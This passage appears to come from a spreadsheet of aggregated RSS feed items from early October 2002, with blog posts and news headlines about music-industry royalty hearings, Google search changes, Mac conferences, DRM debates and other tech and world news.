[5], admire this full-screen picture of my cat[6], and link to this post[7]. There are four lights.[1] http://diveintopython.org/
    Dive Into Python
[2] http://diveintomark.org/archives/2001/09/22.html#addiction_is
    dive into mark 9/22/2001: 
[3] http://diveintomark.org/archives/2001/10/01.html#write
    dive into mark 10/1/2001: 
[4] http://diveintomark.org/archives/2001/10/
    dive into mark October 2001 archives
[5] http://diveintomark.org/resume/resume.html
    my resume in HTML format
[6] http://diveintomark.org/images/j.jpg
    J, 1024 x 768
[7] http://diveintomark.org/archives/2002/10/01.html#there_are_four_lights
    permanent link to this post
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.aaronsw.com/weblog/000624
Date: 2002-10-01T22:36:19-06:00New York Times as a Weblog[1] (source code[2]) Comments appreciated. Yes, I 
know UserLand had something like this[3] but as you can see it doesn't seem to 
be working anymore. [1] http://nytimes.blogspace.com/
[2] http://nytimes.blogspace.com/source.py
[3] http://radio.weblogs.com/0102250/
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85513221
Date: Not suppliedThe Joint Hearing of the Senate Committee and Senate Select Committee on the 
Entertainment Industry is underway in LA, investigating artists' claims that 
the labels engage in unfair and corrupt business-practices. The first day's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10% "reserve" on sales of records shipped, Universal Music had 
    held back more than that for eleven pay periods (roughly under three years) 
    and that, even though his contract calls for no free goods in Europe, they 
    had deducted $87,000 in free goods charges to Europe.  Link[1] Discuss[2] (_Thanks, Paul!_)[1] http://www.musicdish.com/mag/?id=6675
[2] http://www.quicktopic.com/boing/H/jU9jRkFhUcp
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8457381,215/
Date: 2002-10-02T04:58:04+01:00The US has rejected an agreement between Iraq and the United Nations on arms 
inspections, vowing to block the inspectors' return unless they are backed with 
threats of military force.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8430044,215/
Date: 2002-10-01T12:41:57+01:00*Live online:* The Observer's *Tracy McVeigh* and experts *Tim Brighouse* and *
Ann Hodgson* will be here on Thursday at 3pm to discuss the government's 
record. Post your questions now.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000206.html
Date: 2002-10-01T06:31:54-08:00Thanks to an anonymous helper, I've mirrored all 5 ISO images for Red Hat 8.0. 
Ohio - http://family.zawodny.com/~jzawodn/iso/rh80/ (DS-3 connection via 
Sprint) California - http://litterbox.zawodny.com/~jzawodn/iso/rh80/ (multiple 
gigabit connections) Now be nice. :-)...
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8456085,215/
Date: 2002-10-02T03:57:00+01:00*Politics:* For the Labour leader in trouble there are usually two ways out. 
Faced with a restless party, you can either cave in or stand firm, writes *
Jonathan Freedland*.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8443954,1440/
Date: Not suppliedHundreds of US transfusion patients are set to receive red blood cells cleaned 
with compounds that inactivate viruses and bacteria
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8456087,215/
Date: 2002-10-02T03:56:58+01:00*World latest:* Leading Republicans side with the Democrats over the 
president's war powers.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000210.html
Date: 2002-10-01T15:24:02-08:00Wow. Check out Western Digital's Drivezilla. They've announced 200GB hard 
disks. Something tells me that I'll have my own terabyte by the end of 2003....
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8437307,1440/
Date: Not suppliedThe new network aims to thwart hackers and beat technical problems that make 
such networks slow or unreliable
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8443955,1440/
Date: Not suppliedA new internet worm marks a worrying crossover between virus writing and 
hacking, say experts
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85513605
Date: Not suppliedThe French and the iPod aren't getting along -- the iPod outputs more decibels 
through its headphones than are legal in La Belle France. Link[1] Discuss[2] (_
Thanks, Ernie[3]!_)[1] http://translate.google.com/translate?u=http%3A%2F%2Fwww.macgeneration.com%2Fmgnews%2Fdepeche.php%3FaIdDepeche%3D93540&amp;langpair=fr%7Cen&amp;hl=en&amp;ie=ISO-8859-1&amp;prev=%2Flanguage_tools
[2] http://www.quicktopic.com/boing/H/LMHmGmnSwgPG
[3] http://www.psylux.com
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000208.html
Date: 2002-10-01T10:22:46-08:00David Pogue is talking about Mac in the past, present, and future. Mac market 
is growing. It's a small part of a very large and growing pie. So Apple isn't 
dead and won't die. But they'll never be the big...
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85513638
Date: Not suppliedEli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(Israel/PLO agreement of 1993) is another thing much shorter 
    than I had imagined.  Link[1] Discuss[2] (_Thanks, Eli!_)[1] http://www.yale.edu/lawweb/avalon/avalon.htm
[2] http://www.quicktopic.com/boing/H/bYTBfpCnesw
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8428489,215/
Date: 2002-10-01T11:41:00+01:00*Talk:* Join the discussion on the web's liveliest talkboards.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85511986
Date: Not suppliedThe T-Mobile Sidekick -- the first commercial implementation of the wonderful 
Danger Hiptop PDA/phone -- is now onsale and the reviews are starting to 
appear. As soon as I'm in San Francisco for more than a couple days straight, I 
really think I'm going to pick this up.     That's partly because it costs less than half as much as its current 
    competitors -- $199, compared with $450 and up for the others. In the same 
    spirit, T-Mobile will offer unlimited data usage on its new, relatively 
    high- speed "GPRS" network for $40 per month -- far below what a serious 
    surfer would likely rack up under competing wireless-data plans. (Voice 
    time is another story -- more on that later.)     Another reason I like the Sidekick's prospects: It was designed for, and 
    will be pitched to, a very different market. While vendors of the competing 
    hybrids focus on "enterprise" customers -- the big businesses that are 
    supposed to have deep pockets for this sort of thing (even though most 
    clearly don't at this point) -- Danger and T-Mobile are targeting, in their 
    own words, "Internet-savvy, primarily urban, young adults in the 18- to 
    34-year-old demographic." I am that demographic! Link[1] Discuss[2] (_Thanks, Steve[3]!_)[1] http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/2002/09/30/BU202936.DTL
[2] http://www.quicktopic.com/boing/H/LMAtpjUTbVezf
[3] http://www.portigal.com
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8456083,215/
Date: 2002-10-02T03:57:02+01:00Time to transform post-war 'one size fits all' public services, urges PM.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8435176,1440/
Date: Not suppliedThe reaction that forms the potential carcinogen acrylamide in baked foods is 
revealed, suggesting ways of reducing levels
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85513616
Date: Not suppliedThe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Long's oeuvre. There can't be more than a handful of people on 
    this earth who could get a beer-sodden thrash crowd to listen to an English 
    Lit lecture. Thirty seconds later, the audience is sufficiently educated, 
    and the guys begin to wail. Jake the singer holds the microphone over his 
    head and belts out the song in a growling voice that's monster-movie low. 
    "No reason! No corners!" he shouts. Two minutes later, they're done with 
    the pulps and ready to move on to the New Wave. "Our next song is about 
    Harlan Ellison!" Jake bellows, and the geeks, the hipsters, the metalheads, 
    and the drunks let out a howl of mutual joy.     Blï¿½ï¿½dhag -- note the dual umlauts -- hails from Seattle. Describing 
    themselves as "edu-core," the band performs nothing but two-minute thrash 
    tributes to science fiction writers. Between songs, the band pelts the 
    audience with paperback books, quizzes them on book titles, and demands 
    that the audience show their library cards. Their motto: "The Faster You Go 
    Deaf, the More Time You Have to Read."  Link[1] Discuss[2] (_Thanks, Zed[3]!_)[1] http://www.strangehorizons.com/2002/20020930/bloodhag.shtml
[2] http://www.quicktopic.com/boing/H/kfFeZdnp8NE
[3] http://www.mememachinego.com/
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.aaronsw.com/weblog/000625
Date: 2002-10-01T22:54:21-06:00MusicDish: First Blood is Spilled[1]. "Back Street Boy Kevin Richardson [] 
testified that they have NEVER received a royalty check" So much for "we're 
just trying to protect the artists", eh? Wow. The Backstreet Boys! I mean, Janis Ian was easy to dismiss but this is a 
whole 'nother ballgame. Wow.[1] http://www.musicdish.com/mag/?id=6675
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000209.html
Date: 2002-10-01T13:29:57-08:00I had to leave the conference after the first half of the day so that I can get 
some stuff done at work and some work on the book. David Pogue's keynote was 
excellent. He knows the Mac, Apple history,...
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85512053
Date: Not suppliedThe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Dave[3]!_)[1] http://www.distributed.net/pressroom/news-20020926.html
[2] http://www.quicktopic.com/boing/H/wf6mvUdf3xfR
[3] http://www.seizethedave.com/
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85513208
Date: Not suppliedKevin "Free Kevin" Mitnick and Steve "Woz" Wozniak co-hosted an episode of The 
Screen Saver on Tech TV, where Woz autographed one of the laptops that Kevin 
got arrested for using. Now that machine, signed by both net-celebs, is up for 
sale on eBay.     This is the Toshiba Satellite T1960CS, 486 laptop computer seized by the 
    FBI on February 15, 1995, in Raleigh, NC, during the arrest of the world's 
    most celebrated computer hacker, Kevin Mitnick. The laptop is working and 
    has been loaded with a fresh version of Windows 95. A shrink-wrapped 
    version of Windows 95 on floppy, is included with the laptop. The laptop is 
    a 486DX with a color LCD, detachable trackball mouse, AT&amp;T 14.4 PCMCIA 
    modem card, power adapter and documentation in FBI evidence bags. The 
    laptop has been signed on the bottom by Steve Wozniak, co-founder of Apple 
    Computer, and says, "You've got the whole world in your hands. --Woz (Free 
    Kevin!). It is also signed by Mitnick himself. The system was shown on the 
    September 27, 2002 episode of The Screen Savers on TechTV, where the 
    signatures on the bottom were authenticated in a special show hosted by 
    Wozniak and Mitnick. A tape of the show will also be included.  Link[1] Discuss[2] (_Thanks, Jimbo!_)[1] http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&amp;item=2057697313
[2] http://www.quicktopic.com/boing/H/NqDajD2X9Di
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8457387,215/
Date: 2002-10-02T04:57:55+01:00*Money:* Britain's biggest building society has signalled it expects no let-up 
in the runaway property boom.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85511996
Date: Not suppliedMena sez: "We've set up a TrackBack ping repository for attendees of O'Reilly's 
Mac OS X Conference. If you're using Movable Type or a TrackBack-enabled tool, 
you can ping the category relating to your OSXCon-specific weblog post." Link
[1] Discuss[2] (_Thanks, Mena[3]!_)[1] http://www.movabletype.org/osxcon/
[2] http://www.quicktopic.com/boing/H/Eg8fKLFxsFr
[3] http://www.dollarshort.org/
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85512062
Date: Not suppliedHypocrites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Discuss[2][1] http://blogcritics.org/archives/2002/09/30/123242.php#20020930123242
[2] http://www.quicktopic.com/16/H/VL2YSRjKGRqHc
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85514221
Date: Not suppliedThe legendary Clarion Writers' Workshop -- of which I am an alumnus, class of 
'92 -- has spun out another satellite branch (Clarion West, in Seattle, has 
been going for some years now). The new workshop, Clarion South, will be held 
in Queensland, Australia, in 2004, so that antipodeans can also attend 
science-fiction bootcamp without travelling to America. Link[1] Discuss[2] (_
Thanks, Pat!_)[1] http://www.clarionsouth.org/
[2] http://www.quicktopic.com/boing/H/fXD4NLwaVDe
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/03.html#when_an_engineer_flaps_his_wings
Date: 2002-10-03T01:31:51-05:00Remember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#1 "mark"[1]; I am now #6). The changes appear to be the result of an 
attempt to stop two phenomena: explicitly selling ads based on PageRank[2], and 
Google bombing[3]. Specifically, Google is now apparently cross-checking link text with the linked 
site, and discounting or ignoring links whose text does not appear in the 
linked site. This all but kills off Google bombing. Searching for "go to hell"
[4] no longer takes you to microsoft.com[5]; searching for "talentless hack"[6] 
no longer finds ohmessylife.com[7],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medium-to-large sites that had previously been doing everything right (as far 
as page structure, link structure, accessibility, and general honest hard work 
putting together a usable and useful site). The Webmasterworld forums are alive 
with complaints and speculation: - New update, pagerank death?[8] 
- September 2002 Google Update Discussion - part 1[9] 
- Let's find out what happened - Sept 2002 Update - pt. 2[10] (Side note: amongst the confusion, it has been suggested that Google is no 
longer indexing ALT text in images. I can confirm that this is absolutely 
false. Searching diveintomark.org for "gimli"[11] finds my entry of July 29[12]
, where "Gimli" is mentioned only in the ALT text of an image.) Regardless, Google's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they're 
tracking, so I tried to find my own concrete example of crap search results. It 
didn't take long. - Searching for reservation hotel[13] brings up an empty sub-page[14] of a 
hotel reservation company in Italy[15] as the first result. This seems 
unhelpful, and unlikely to be relevant to the average US-based consumer (and 
Google absolutely knows I'm in the US based on my IP address). 
- Searching for news observer nc[16] (the News &amp; Observer is a Raleigh, NC 
newspaper) does find The News &amp; Observer[17], but it also finds an Internet 
betting spam page[18] at #7 and a non-existent page[19] at #9. 
- Searching for eminem[20] gives us two generic portal pages, a non-existent 
site, and a site that redirects to a site that continuously redirects to itself 
(I am not making this up). And this is just on the first page. Good thing I 
didn't care that much about Eminem to begin with, because Google just isn't 
that helpful. Many people in the Webmasterworld forums are now suggesting that AllTheWeb.com
[21] has better search results overall. Just as a single comparison, their 
results for "eminem"[22] do appear to be much more relevant. Is this the 
beginning of the end of Google's reign?[1]  http://www.google.com/search?q=mark
[2]  http://www.pradnetwork.com/affiliate.htm
[3]  http://uber.nu/2001/04/06/
[4]  http://www.google.com/search?q=%22go+to+hell%22
[5]  http://www.microsoft.com/
[6]  http://www.google.com/search?q=talentless+hack
[7]  http://www.ohmessylife.com/
[8]  http://www.webmasterworld.com/forum3/5646.htm
[9]  http://www.webmasterworld.com/forum3/5688.htm
[10] http://www.webmasterworld.com/forum3/5723.htm
[11] http://www.google.com/search?q=gimli+site%3Adiveintomark.org
[12] http://diveintomark.org/archives/2002/07/29.html
[13] http://www.google.com/search?q=reservation+hotel
[14] http://www.venere.it/home/italy.html
[15] http://www.venere.it/
[16] http://www.google.com/search?q=news+observer+nc
[17] http://www.news-observer.com/
[18] http://www.linkslsgolfworld.com/king-arthur-knight-of-the-round-table.htm
[19] http://www.nando.net/nt/nao/
[20] http://www.google.com/search?q=eminem
[21] http://www.alltheweb.com/
[22] http://www.alltheweb.com/search?query=eminem
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/02.html#smitten
Date: 2002-10-02T09:49:49-05:00_Heather Hamilton_: Hypochondriac[1]. â€œIt is because of my dog that I 
have been smitten with an Ovarian CystÂ®; it is because of my dog that my 
husband can't breathe with phlegm-free lungs. I can safely blame the dog for 
everything.â€[1] http://www.dooce.com/mtarchives/10_01_2002.html
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85516563
Date: Not suppliedInterview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Discuss[2][1] http://www.tcj.com/247/i_rall.html
[2] http://www.quicktopic.com/16/H/de7BfPnMekg
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8494551,159/
Date: 2002-10-03T05:50:07+01:00Rendering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
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85518715
Date: Not suppliedNYT op-ed piece about this newfangled OS called Linux and how it is developed 
using something called the "open source" method. This is the paper to go to for 
breaking news, folks. Link[1] Discuss[2] _(Thanks, Dave!)_[1] http://www.nytimes.com/2002/09/18/opinion/18WED2.html
[2] http://www.quicktopic.com/16/H/VgggkvaadJKnu
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8483156,1440/
Date: Not suppliedKeys encoded in photons of light are sent 23 kilometres through air, an 
important step towards a secure global communications system
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85516333
Date: Not suppliedAll through October, Berkeley's Mathematical Sciences Research Institute is 
hosting Cinemath, a mathematics film festival:     Permutations and Configurations: A Calculated Cinema     In this avant-garde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avant-garde films by multiplying, dividing, and otherwise transforming 
    abstract images- including spirals, rectangles, and circles to produce 
    dynamic rhythms and harmonies. Today such visual music and motion graphics 
    are the currency of digital graphics. Anthony McCall's film performances 
    such as Line Describing a Cone create 3-D geometric shapes into which the 
    viewer can literally step. We also explore films by pioneers of 
    machine-generated and computer-produced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Link[1] Discuss[2] (_Thanks, Jef[3]!_)[1] http://www.msri.org/20thanniversary/cinemath.html
[2] http://www.quicktopic.com/boing/H/Adiw2xL5kw8ug
[3] http://www.acme.com
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/215,5,215/
Date: 2002-10-03T04:21:02+01:00*World latest:* The ethnic Greek and Turkish leaders of Cyprus will hold 
crucial talks today in an effort to reunite the island.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/215,7,215/
Date: 2002-10-03T04:21:00+01:00*Business:* Federal prosecutors in the US have filed charges against the 
highest ranking Enron executive yet.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000218.html
Date: 2002-10-02T22:52:53-08:00I realized something the other day. I've been programming in Perl for roughly 
seven or eight years now. Maybe nine. It's hard to remember for sure. But at 
some point it lost its shine. It used to be a lot...
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85515879
Date: Not suppliedDismuke has a 24 hour radio station and RealAudio archive of '20s and '30s 
music. Some nice stuff in here. (Also check out my favorite music archive, Red 
Hot Jazz[1].) Link[2] Discuss[3][1] http://boingboing.net/redhotjazz.com
[2] http://dismuke.org/
[3] http://www.quicktopic.com/16/H/xywUUftYHEg
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85515860
Date: Not suppliedRob "Pringles Can" Flickenger and others at the O'Reilly OS X con have tracked 
down the cause of the annoying flakiness in the wireless network here -- every 
20 or 30 seconds, you start getting "connection refused" messages from your 
browser and other net-utilities.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Don't do the 
brown WiFi, the brown WiFi is BAD (_Thanks, Rob!_)[1] http://www.oreillynet.com/pub/wlg/1414
[2] http://www.oreillynet.com/pub/wlg/2086
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/02.html#reunion
Date: 2002-10-02T09:43:36-05:00_Leslie Harpold_: This Too, Shall Pass[1]. â€œThere's a rumor that my 
possessions and I will be reunited in about a week.â€[1] http://leslie.harpold.com/presents/000077.html
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/02.html#insanely_complicated
Date: 2002-10-02T09:34:51-05:00_Ian Hickson_: My faceless enemy has been defeated[1]. â€œMy arch nemesis 
over the last couple of weeks has been the very poorly documented Hebrew 
Traditional Numbering System.â€[1] http://ln.hixie.ch/?start=1033524738&amp;count=1
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85516136
Date: Not supplied[IMG: http://www.craphound.com/images/hiptopblog.jpg] The T-Mobile Sidekick and 
other instances of the Danger Hiptop PDA/Phone are being promoted as mobile 
blogging tools. Link[1] Discuss[2] (_via Hack the Planet[3]_) 
[1] http://www.hiptop.com/
[2] http://www.quicktopic.com/boing/H/GHXGWhmS5e2
[3] http://wmf.editthispage.com/
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/02.html#rdf_redux
Date: 2002-10-02T09:42:39-05:00I think I'm going to become one of _those_ people. You know, one of those 
people who has a â€œSemantic Webâ€ category on their weblog. This will 
be a Geek Purity Test question someday. Onward: - _Phil Ringnalda_: Fun with RDF[1]. â€œRDF can actually be fun, as long as 
you don't foolishly invest too much ego in trying to store RSS 1.0, or wander 
off into flame wars.â€ From which we find: 
- _Shelley Powers_: The RDF Query-O-Matic[2], and The RDF Query-O-Matic 
explained[3]. â€œThe Query-o-Matic accepts the name of an RDF file (any 
valid RDF file), and an RDFQL (RDF Query Language) query, and will print out a 
test value found as a result of that query.â€ 
- _Marcus Campbell_: â€œMy FOAF autocreation script is moving along nicely
[4]. It's now looping through my OPML blogroll file, checking the first load of 
bites in people's pages for head linked FOAF files, grabbing certain elements 
from these files (if they have one) and spitting them out into a brand new FOAF 
file for me.â€ 
- _Joe Gregorio_: The Well-Formed Web[5]. â€œAfter spending some time 
badgering poor Bill Kearney for a concrete benefit of having RDF in RSS 1.0 and 
not getting a really satisfactory answer I went back and read Paul Ford's essay 
again. I wanted to get that old religious feeling back again. It didn't work. 
The magic was gone.â€ [1] http://philringnalda.com/archives/002336.php
[2] http://weblob.burningbird.net/services/query.htm
[3] http://weblog.burningbird.net/archives/000564.php
[4] http://www.ninjakitten.net/digiboy/2002_09.php#post000545
[5] http://bitworking.org/wellformed.html
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85516100
Date: Not suppliedDan Gillmor's column this week is all about Apple's burgeoning resistance to 
the Hollywood onslaught on general-purpose computing:     Intel's doing it. Advanced Micro Devices is doing it. Microsoft is doing 
    it.     Apple Computer isn't.     What's Apple not doing? It's not -- at least so far -- moving toward an 
    anti-customer embrace with Hollywood's movie studios and the other members 
    of the powerful entertainment cartel.  Link[1] Discuss[2][1] http://www.siliconvalley.com/mld/siliconvalley/business/columnists/4193839.htm
[2] http://www.quicktopic.com/boing/H/LhvQTmDf6wi
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/215,10,215/
Date: 2002-10-02T18:11:03+01:00*Rio dispatch: *18,880 candidates standing in the Brazilian elections get a 
party political broadcast each, says *Alex Bellos*.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8483155,1440/
Date: Not suppliedAirlines are facing fresh calls to fit fuel tank inerting systems, following 
warnings from Boeing about potentially faulty fuel pumps
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8483157,1440/
Date: Not suppliedContrary to popular belief, a new study shows women receive the same mental 
health boost from marriage as men
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/215,8,215/
Date: 2002-10-03T04:20:59+01:00*Arts:* Robbie Williams has become one of the highest paid singers in the 
world.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/215,2,215/
Date: 2002-10-03T04:21:05+01:00Bill Clinton and a tale of two Tonys. *Howard Jacobson* on his first Labour 
party conference.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85516395
Date: Not supplied&gt;&gt;From Ed Felten's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government-approved copy protection technology.  Link[1] Discuss[2][1] http://www.freedom-to-tinker.com/archives/cat_fritzs_hit_list.html
[2] http://www.quicktopic.com/16/H/CnsZyygHAwp
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/215,1,215/
Date: 2002-10-03T04:21:06+01:00Bill Clinton uses his Labour conference speech to urge George Bush to persevere 
with the UN.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000217.html
Date: 2002-10-02T22:22:55-08:00The business news of the day has long been telling us that we're in a very slow 
economic period. Yet I've received multiple job solicitations recently. Not 
random head-hunters or anything. People I know, who know me relatively well, 
want...
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/02.html#best_served_cold
Date: 2002-10-02T09:51:54-05:00Thank you[1]. I needed that. We now return you to your regularly scheduled 
programming.[1] http://www.daypop.com/top/archive/2002/10/20021002000000.htm
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000212.html
Date: 2002-10-02T09:34:00-08:00Talking about his mainframe background and roots in computing. He played a lot 
on the big iron and sorta "missed" the PC revolution. He wasn't terribly 
interested in PCs for quite a while. Then he got to play with one...
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000219.html
Date: 2002-10-02T23:30:23-08:00As noted in the inluminent weblog there don't seem to be many bloggers at 
OSXCon. At least they're not blogging. That's rather disappointing. They were 
strong at OSCON and the Emerging Technologies Conference (damn, I wish I had 
the foresight...
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8473772,1440/
Date: Not suppliedAnd so many North Sea harbour seals have been killed that a repeat outbreak in 
the 2003 breeding season is highly unlikely
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/215,4,215/
Date: 2002-10-03T04:21:03+01:00*Politics:* Ex-lover tours studios to denounce former PM.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000220.html
Date: 2002-10-03T00:24:56-08:00Last week, I noticed that I was on Dave's radar. Now that I've caught up on 
blogging, it seems that I'm on Windley's radar too. He picked up on my 
FreeBSD/Linux MySQL story and that provoked an interesting discussion of...
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000213.html
Date: 2002-10-02T10:09:11-08:00Which was the better UI? Mac OS 9? Mac OS X? Windows? Nobody can agree. Tim 
O'Reilly didn't like Mac OS 9. He gets OS X. Traditional Mac users are a bit 
annoyed by OS X. They think it's a...
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.joelonsoftware.com/news/20021002.html
Date: Not suppliedI've been snowed under for the last four weeks, working on the FogBUGZ 3.0 
Setup program. For various reasons none of the commercial setup toolkits (Wise, InstallShield, 
Windows Installer) could do even 25%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I'll 
write more about what I learned.   One benefit of writing a setup program from scratch is that I don't have to 
have someone else's stupid cartoon-of-a-computer-and-floppy-disks in the upper 
right hand corner. I used a photograph of the London Skyline, currently 
infested with cranes. I took the picture from the cafe at the Tate Modern.  [IMG: http://www.joelonsoftware.com/pictures/fbsetup.jpg (FogBUGZ 3.0 Setup)]
 </t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/215,0,215/
Date: 2002-10-03T04:21:07+01:00Washington has revealed its intention to use UN weapons inspections as a 
possible first step towards a military occupation of Iraq.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85516609
Date: Not suppliedHere's a brief interview with me.      *Interviewer:* If the Boing Boing zine and blog were TV characters, who'd 
    they be, and how'd they get on?     *Mark:* The zine would be Jethro Bodine of "The Beverly Hillbillies" -- 
    curious, neophilic, xenophilic, gleeful, and eager to adopt any new theory 
    or conspiracy as the absolute truth. The Blog would be Sherman from 
    "Peabody's Improbable History" -- a traveler of time and space in search of 
    beauty, truth, and the outre. I think Jethro bOING bOING and Sherman Boing 
    Boing would be great pals. Jethro would invite Sherman's dog, Mr. Peabody, 
    to go raccoon hunting with him, and Sherman would send Jethro 40 years into 
    the future to hang out at the Playboy Mansion.  Link[1] Discuss[2][1] http://www.octapod.org/jeanpoole/archives/000203.html#000203
[2] http://www.quicktopic.com/16/H/kymC9LzuB2bHM
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000214.html
Date: 2002-10-02T16:04:06-08:00Java has been successful everywhere but the desktop. Or at least that's what 
people here. It's big on the server and that downs out the desktop news. What 
else went wrong? Applets. Microsoft's battle with Java. For the longest 
time,...
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85517490
Date: Not suppliedMark and I were two of many wonderful contributors to a new book from TechTV, 
called "The Catalog of Tomorrow." It's like a Whole Earth Catalog for 
futuristic technologies, with great illustrated spreads throughout -- you can 
get a peek inside at Amazon[1], and buy from Powell's or your other favorite 
indie store. Link[2] Discuss[3] (_Thanks, Andrew!_)[1] http://www.amazon.com/exec/obidos/tg/detail/-/0789728109/ref=lib_dp_TFCV/104-0366981-9801540?v=glance&amp;vi=reader#reader-link
[2] http://www.powells.com/cgi-bin/biblio?inkey=62-0789728109-0
[3] http://www.quicktopic.com/boing/H/Fh8aUanpPCe
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8477945,1440/
Date: Not suppliedThe launch is postponed until at least Monday - the first time bad weather in 
Houston has delayed a shuttle flight
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85516085
Date: Not suppliedWe did a great panel on DRM and the Digital Hub yesterday here at OSXCon with 
Tim O'Reilly, Victor Nemachek (from El Gato, makers of the EyeTV digital TV 
recorder for the Mac), Dan Gillmor, and JD Lasica, who's working on a book on 
fair use and copyfights. Glenn "802.11b Networking News" Fleishman took great 
notes through the talk:     Dan: Tim, you're a "content or copyright holderï¿½talk about these issues."     Obscurity can be a tool. Something like 100K books published in the US. 
    Most books are forgotten after publication. Ravening copying theft is 
    wrong: most aren't pirated. Publishers puts book that someone sweated over 
    for years on shelves for three months, doesn't sell, that's it, and the 
    author has no rights. Publishers keeps rights til out of print, etc.     Oblivion is fate of most books: "Piracy would be the best thing for those 
    books." People wouldn't pirate them in general, because people generally 
    like to respect the rights of creators. "Piracy is a marginal act; it takes 
    away some of the cream."     Publishing won't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re-emerge as publishers. Will 
    Hollywood be the publishers of the future or will someone else?     Users are voting by their use of programs like Kazaa. Eventually, media 
    companies will adopt. But if the changes are hardcoded into law, then we're 
    stuck for a long time with "some mistakes."  Link[1] Discuss[2] (_via Dan Gillmor's eJournal[3]_)[1] http://blog.glennf.com/gmblog/archives/00000254.htm
